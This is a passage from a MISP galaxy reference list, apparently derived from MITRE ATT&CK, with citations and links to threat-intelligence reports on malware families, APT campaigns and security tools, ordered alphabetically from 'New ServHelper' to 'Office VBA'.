Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.

The tag is: misp-galaxy:references="Deep Instinct TA505 Apr 2019"

Table 14686. Table References

Links

https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/

Janicab

Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.

The tag is: misp-galaxy:references="Janicab"

Table 14687. Table References

Links

http://www.thesafemac.com/new-signed-malware-called-janicab/

MSTIC NOBELIUM May 2021

Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.

The tag is: misp-galaxy:references="MSTIC NOBELIUM May 2021"

Table 14688. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Microsoft Phosphorus Mar 2019

Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.

The tag is: misp-galaxy:references="Microsoft Phosphorus Mar 2019"

Table 14689. Table References

Links

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

FireEye SUNSHUTTLE Mar 2021

Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.

The tag is: misp-galaxy:references="FireEye SUNSHUTTLE Mar 2021"

Table 14690. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

Blasco 2013

Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Blasco 2013"

Table 14691. Table References

Links

http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments

Malwarebytes Targeted Attack against Saudi Arabia

Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Malwarebytes Targeted Attack against Saudi Arabia"

Table 14692. Table References

Links

https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/

FireEye APT34 Dec 2017

Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="FireEye APT34 Dec 2017"

Table 14693. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

Unit 42 Cobalt Gang Oct 2018

Unit 42. (2018, October 25). New Techniques to Uncover and Attribute Financial actors Commodity Builders and Infrastructure Revealed. Retrieved December 11, 2018.

The tag is: misp-galaxy:references="Unit 42 Cobalt Gang Oct 2018"

Table 14694. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/10/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/

ESET TeleBots Oct 2018

Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="ESET TeleBots Oct 2018"

Table 14695. Table References

Links

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

Unit 42 DarkHydrus July 2018

Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.

The tag is: misp-galaxy:references="Unit 42 DarkHydrus July 2018"

Table 14696. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

Bitdefender Trickbot March 2020

Tudorica, R., Maximciuc, A., Vatamanu, C. (2020, March 18). New TrickBot Module Bruteforces RDP Connections, Targets Select Telecommunication Services in US and Hong Kong. Retrieved March 15, 2021.

The tag is: misp-galaxy:references="Bitdefender Trickbot March 2020"

Table 14697. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf

Malwarebytes Konni Aug 2021

Threat Intelligence Team. (2021, August 23). New variant of Konni malware used in campaign targetting Russia. Retrieved January 5, 2022.

The tag is: misp-galaxy:references="Malwarebytes Konni Aug 2021"

Table 14698. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/

Proofpoint Vega Credential Stealer May 2018

Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Proofpoint Vega Credential Stealer May 2018"

Table 14699. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign

Proofpoint Azorult July 2018

Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018.

The tag is: misp-galaxy:references="Proofpoint Azorult July 2018"

Table 14700. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

Avira Mustang Panda January 2020

Hamzeloofard, S. (2020, January 31). New wave of PlugX targets Hong Kong | Avira Blog. Retrieved April 13, 2021.

The tag is: misp-galaxy:references="Avira Mustang Panda January 2020"

Table 14701. Table References

Links

https://www.avira.com/en/blog/new-wave-of-plugx-targets-hong-kong

PaloAlto DNS Requests May 2016

Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved November 15, 2018.

The tag is: misp-galaxy:references="PaloAlto DNS Requests May 2016"

Table 14702. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

Palo Alto DNS Requests

Grunzweig, J., et al. (2016, May 24). New Wekby Attacks Use DNS Requests As Command and Control Mechanism. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Palo Alto DNS Requests"

Table 14703. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

Unit42 Azorult Nov 2018

Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018.

The tag is: misp-galaxy:references="Unit42 Azorult Nov 2018"

Table 14704. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/

FireEye Clandestine Fox

Chen, X., Scott, M., Caselden, D.. (2014, April 26). New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="FireEye Clandestine Fox"

Table 14705. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html

Twitter ItsReallyNick Platinum Masquerade

Carr, N.. (2018, October 25). Nick Carr Status Update. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Twitter ItsReallyNick Platinum Masquerade"

Table 14706. Table References

Links

https://twitter.com/ItsReallyNick/status/1055321868641689600

Twitter ItsReallyNick APT32 pubprn Masquerade

Carr, N.. (2017, December 26). Nick Carr Status Update APT32 pubprn. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Twitter ItsReallyNick APT32 pubprn Masquerade"

Table 14707. Table References

Links

https://twitter.com/ItsReallyNick/status/945681177108762624

Twitter ItsReallyNick APT41 EK

Carr, N. (2019, October 30). Nick Carr Status Update APT41 Environmental Keying. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Twitter ItsReallyNick APT41 EK"

Table 14708. Table References

Links

https://twitter.com/ItsReallyNick/status/1189622925286084609

Twitter ItsReallyNick Masquerading Update

Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading. Retrieved April 22, 2019.

The tag is: misp-galaxy:references="Twitter ItsReallyNick Masquerading Update"

Table 14709. Table References

Links

https://twitter.com/ItsReallyNick/status/1055321652777619457

SecureWorks NICKEL GLADSTONE profile Sept 2021

SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021.

The tag is: misp-galaxy:references="SecureWorks NICKEL GLADSTONE profile Sept 2021"

Table 14710. Table References

Links

https://www.secureworks.com/research/threat-profiles/nickel-gladstone

Microsoft NICKEL December 2021

MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.

The tag is: misp-galaxy:references="Microsoft NICKEL December 2021"

Table 14711. Table References

Links

https://www.microsoft.com/security/blog/2021/12/06/nickel-targeting-government-organizations-across-latin-america-and-europe

Nicolas Falliere, Liam O Murchu, Eric Chien February 2011

Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February) W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017

The tag is: misp-galaxy:references="Nicolas Falliere, Liam O Murchu, Eric Chien February 2011"

Table 14712. Table References

Links

https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf

ProofPoint Ursnif Aug 2016

Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="ProofPoint Ursnif Aug 2016"

Table 14713. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality

NIST Server Security July 2008

Scarfone, K. et al.. (2008, July). NIST Special Publication 800-123 - Guide to General Server Security. Retrieved July 26, 2018.

The tag is: misp-galaxy:references="NIST Server Security July 2008"

Table 14714. Table References

Links

https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf

Netskope Nitol

Malik, A. (2016, October 14). Nitol Botnet makes a resurgence with evasive sandbox analysis technique. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Netskope Nitol"

Table 14715. Table References

Links

https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique

FireEye Njw0rm Aug 2013

Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="FireEye Njw0rm Aug 2013"

Table 14716. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/njw0rm-brother-from-the-same-mother.html

Nltest Manual

ss64. (n.d.). NLTEST.exe - Network Location Test. Retrieved February 14, 2019.

The tag is: misp-galaxy:references="Nltest Manual"

Table 14717. Table References

Links

https://ss64.com/nt/nltest.html

Nmap: the Network Mapper

Nmap. (n.d.). Nmap: the Network Mapper - Free Security Scanner. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Nmap: the Network Mapper"

Table 14718. Table References

Links

https://nmap.org/

MSTIC Nobelium Oct 2021

Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="MSTIC Nobelium Oct 2021"

Table 14719. Table References

Links

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

Microsoft Nobelium Admin Privileges

Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved January 31, 2022.

The tag is: misp-galaxy:references="Microsoft Nobelium Admin Privileges"

Table 14720. Table References

Links

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks

Symantec Noberus September 22 2022

Symantec Threat Hunter Team. (2022, September 22). Noberus Ransomware: Darkside and BlackMatter Successor Continues to Evolve its Tactics. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="Symantec Noberus September 22 2022"

Table 14721. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps

new_rust_based_ransomware

Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="new_rust_based_ransomware"

Table 14722. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware

SentinelOne NobleBaron June 2021

Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.

The tag is: misp-galaxy:references="SentinelOne NobleBaron June 2021"

Table 14723. Table References

Links

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

NodeJS

OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="NodeJS"

Table 14724. Table References

Links

https://nodejs.org/

Mandiant No Easy Breach

Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.

The tag is: misp-galaxy:references="Mandiant No Easy Breach"

Table 14725. Table References

Links

http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016

ESET PipeMon May 2020

Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="ESET PipeMon May 2020"

Table 14726. Table References

Links

https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/

nohup Linux Man

Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.

The tag is: misp-galaxy:references="nohup Linux Man"

Table 14727. Table References

Links

https://linux.die.net/man/1/nohup

Unit 42 Nokki Oct 2018

Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Unit 42 Nokki Oct 2018"

Table 14728. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

ESET Nomadic Octopus 2018

Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="ESET Nomadic Octopus 2018"

Table 14729. Table References

Links

https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf

Malwarebytes Pony April 2016

hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020.

The tag is: misp-galaxy:references="Malwarebytes Pony April 2016"

Table 14730. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/

WithSecure Lazarus-NoPineapple Threat Intel Report 2023

Ruohonen, S. & Robinson, S. (2023, February 2). No Pineapple! -DPRK Targeting of Medical Research and Technology Sector. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="WithSecure Lazarus-NoPineapple Threat Intel Report 2023"

Table 14731. Table References

Links

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

xorrior chrome extensions macOS

Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.

The tag is: misp-galaxy:references="xorrior chrome extensions macOS"

Table 14732. Table References

Links

https://www.xorrior.com/No-Place-Like-Chrome/

Cybernews Yanfeng Qilin November 2023

Stefanie Schappert. (2023, November 28). North American auto supplier Yanfeng claimed by Qilin ransom group. Retrieved November 30, 2023.

The tag is: misp-galaxy:references="Cybernews Yanfeng Qilin November 2023"

Table 14733. Table References

Links

https://cybernews.com/news/yanfeng-ransomware-attack-claimed-qilin/

The Hacker News Lazarus Aug 2022

Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.

The tag is: misp-galaxy:references="The Hacker News Lazarus Aug 2022"

Table 14734. Table References

Links

https://thehackernews.com/2022/08/north-korea-hackers-spotted-targeting.html

Zdnet Kimsuky Group September 2020

Cimpanu, C. (2020, September 30). North Korea has tried to hack 11 officials of the UN Security Council. Retrieved November 4, 2020.

The tag is: misp-galaxy:references="Zdnet Kimsuky Group September 2020"

Table 14735. Table References

Links

https://www.zdnet.com/article/north-korea-has-tried-to-hack-11-officials-of-the-un-security-council/

Volexity InkySquid BLUELIGHT August 2021

Cash, D., Grunzweig, J., Meltzer, M., Adair, S., Lancaster, T. (2021, August 17). North Korean APT InkySquid Infects Victims Using Browser Exploits. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Volexity InkySquid BLUELIGHT August 2021"

Table 14736. Table References

Links

https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/

Talos Kimsuky Nov 2021

An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.

The tag is: misp-galaxy:references="Talos Kimsuky Nov 2021"

Table 14737. Table References

Links

https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html

Volexity InkySquid RokRAT August 2021

Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Volexity InkySquid RokRAT August 2021"

Table 14738. Table References

Links

https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/

Lazarus APT January 2022

Saini, A. and Hossein, J. (2022, January 27). North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.

The tag is: misp-galaxy:references="Lazarus APT January 2022"

Table 14739. Table References

Links

https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/

Github NoRunDll

gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.

The tag is: misp-galaxy:references="Github NoRunDll"

Table 14740. Table References

Links

https://github.com/gtworek/PSBits/tree/master/NoRunDll

CrowdStrike Scattered Spider SIM Swapping December 22 2022

Tim Parisi. (2022, December 22). Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies. Retrieved September 14, 2023.

The tag is: misp-galaxy:references="CrowdStrike Scattered Spider SIM Swapping December 22 2022"

Table 14741. Table References

Links

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

Crowdstrike TELCO BPO Campaign December 2022

Parisi, T. (2022, December 2). Not a SIMulation: CrowdStrike Investigations Reveal Intrusion Campaign Targeting Telco and BPO Companies. Retrieved June 30, 2023.

The tag is: misp-galaxy:references="Crowdstrike TELCO BPO Campaign December 2022"

Table 14742. Table References

Links

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

Sophos Dyreza April 2015

Ducklin, P. (2015, April 20). Notes from SophosLabs: Dyreza, the malware that discriminates against old computers. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="Sophos Dyreza April 2015"

Table 14743. Table References

Links

https://nakedsecurity.sophos.com/2015/04/20/notes-from-sophoslabs-dyreza-the-malware-that-discriminates-against-old-computers/

NIST Supply Chain 2012

Boyens, J,. Et al.. (2002, October). Notional Supply Chain Risk Management Practices for Federal Information Systems. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="NIST Supply Chain 2012"

Table 14744. Table References

Links

http://dx.doi.org/10.6028/NIST.IR.7622

eSentire FIN7 July 2021

eSentire. (2021, July 21). Notorious Cybercrime Gang, FIN7, Lands Malware in Law Firm Using Fake Legal Complaint Against Jack Daniels’ Owner, Brown-Forman Inc.. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="eSentire FIN7 July 2021"

Table 14745. Table References

Links

https://www.esentire.com/security-advisories/notorious-cybercrime-gang-fin7-lands-malware-in-law-firm-using-fake-legal-complaint-against-jack-daniels-owner-brown-forman-inc

Secureworks NotPetya June 2017

Counter Threat Research Team. (2017, June 28). NotPetya Campaign: What We Know About the Latest Global Ransomware Attack. Retrieved June 11, 2020.

The tag is: misp-galaxy:references="Secureworks NotPetya June 2017"

Table 14746. Table References

Links

https://www.secureworks.com/blog/notpetya-campaign-what-we-know-about-the-latest-global-ransomware-attack

SensePost NotRuler

SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost NotRuler"

Table 14747. Table References

Links

https://github.com/sensepost/notruler

FireEye APT29 Nov 2018

Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="FireEye APT29 Nov 2018"

Table 14748. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html

NT API Windows

The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="NT API Windows"

Table 14749. Table References

Links

https://undocumented.ntinternals.net/

Npcap: Windows Packet Capture Library & Driver

Npcap. (n.d.). Npcap: Windows Packet Capture Library & Driver. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Npcap: Windows Packet Capture Library & Driver"

Table 14750. Table References

Links

https://npcap.com/

NPLogonNotify

Microsoft. (2021, October 21). NPLogonNotify function (npapi.h). Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPLogonNotify"

Table 14751. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/api/npapi/nf-npapi-nplogonnotify

NPPSPY

Grzegorz Tworek. (2021, December 15). NPPSpy. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="NPPSPY"

Table 14752. Table References

Links

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

ntdsutil.exe - LOLBAS Project

LOLBAS. (2020, January 10). ntdsutil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="ntdsutil.exe - LOLBAS Project"

Table 14753. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Ntdsutil/

Ntdsutil Microsoft

Microsoft. (2016, August 31). Ntdsutil Microsoft. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="Ntdsutil Microsoft"

Table 14754. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)

Microsoft NTFS File Attributes Aug 2010

Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="Microsoft NTFS File Attributes Aug 2010"

Table 14755. Table References

Links

https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/

NtQueryInformationProcess

Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.

The tag is: misp-galaxy:references="NtQueryInformationProcess"

Table 14756. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

AsyncRAT GitHub

Nyan-x-Cat. (n.d.). NYAN-x-CAT / AsyncRAT-C-Sharp. Retrieved October 3, 2023.

The tag is: misp-galaxy:references="AsyncRAT GitHub"

Table 14757. Table References

Links

https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/blob/master/README.md

Joe Sec Nymaim

Joe Security. (2016, April 21). Nymaim - evading Sandboxes with API hammering. Retrieved September 30, 2021.

The tag is: misp-galaxy:references="Joe Sec Nymaim"

Table 14758. Table References

Links

https://www.joesecurity.org/blog/3660886847485093803

OWASP Fingerprinting

OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="OWASP Fingerprinting"

Table 14759. Table References

Links

https://wiki.owasp.org/index.php/OAT-004_Fingerprinting

OWASP Vuln Scanning

OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="OWASP Vuln Scanning"

Table 14760. Table References

Links

https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning

BlackHat API Packers

Choi, S. (2015, August 6). Obfuscated API Functions in Modern Packers. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="BlackHat API Packers"

Table 14761. Table References

Links

https://www.blackhat.com/docs/us-15/materials/us-15-Choi-API-Deobfuscator-Resolving-Obfuscated-API-Functions-In-Modern-Packers.pdf

FireEye Obfuscation June 2017

Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="FireEye Obfuscation June 2017"

Table 14762. Table References

Links

https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

objective-see 2017 review

Patrick Wardle. (n.d.). Retrieved March 20, 2018.

The tag is: misp-galaxy:references="objective-see 2017 review"

Table 14763. Table References

Links

https://objective-see.com/blog/blog_0x25.html

Talos Oblique RAT March 2021

Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.

The tag is: misp-galaxy:references="Talos Oblique RAT March 2021"

Table 14764. Table References

Links

https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

IBM ITG07 June 2019

McMillen, D. Sperry, C. (2019, June 14). Observations of ITG07 Cyber Operations. Retrieved May 17, 2021.

The tag is: misp-galaxy:references="IBM ITG07 June 2019"

Table 14765. Table References

Links

https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/

Palo Alto CVE-2015-3113 July 2015

Falcone, R. and Wartell, R.. (2015, July 27). Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="Palo Alto CVE-2015-3113 July 2015"

Table 14766. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

Volexity OceanLotus Nov 2017

Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.

The tag is: misp-galaxy:references="Volexity OceanLotus Nov 2017"

Table 14767. Table References

Links

https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/

Volexity Ocean Lotus November 2020

Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.

The tag is: misp-galaxy:references="Volexity Ocean Lotus November 2020"

Table 14768. Table References

Links

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

OceanLotus for OS X

Eddie Lee. (2016, February 17). OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="OceanLotus for OS X"

Table 14769. Table References

Links

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

ESET OceanLotus macOS April 2019

Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="ESET OceanLotus macOS April 2019"

Table 14770. Table References

Links

https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/

ESET OceanLotus

Foltýn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.

The tag is: misp-galaxy:references="ESET OceanLotus"

Table 14771. Table References

Links

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

Securelist Octopus Oct 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Securelist Octopus Oct 2018"

Table 14772. Table References

Links

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

LOLBAS Odbcconf

LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="LOLBAS Odbcconf"

Table 14773. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/

Microsoft odbcconf.exe

Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.

The tag is: misp-galaxy:references="Microsoft odbcconf.exe"

Table 14774. Table References

Links

https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017

GrimBlog UsernameEnum

GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.

The tag is: misp-galaxy:references="GrimBlog UsernameEnum"

Table 14775. Table References

Links

https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

GitHub Office 365 User Enumeration

gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="GitHub Office 365 User Enumeration"

Table 14776. Table References

Links

https://github.com/gremwell/o365enum

GitHub Office-Crackros Aug 2016

Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="GitHub Office-Crackros Aug 2016"

Table 14777. Table References

Links

https://github.com/itsreallynick/office-crackros

GlobalDotName Jun 2019

Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.

The tag is: misp-galaxy:references="GlobalDotName Jun 2019"

Table 14778. Table References

Links

https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

Microsoft VBA

Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.

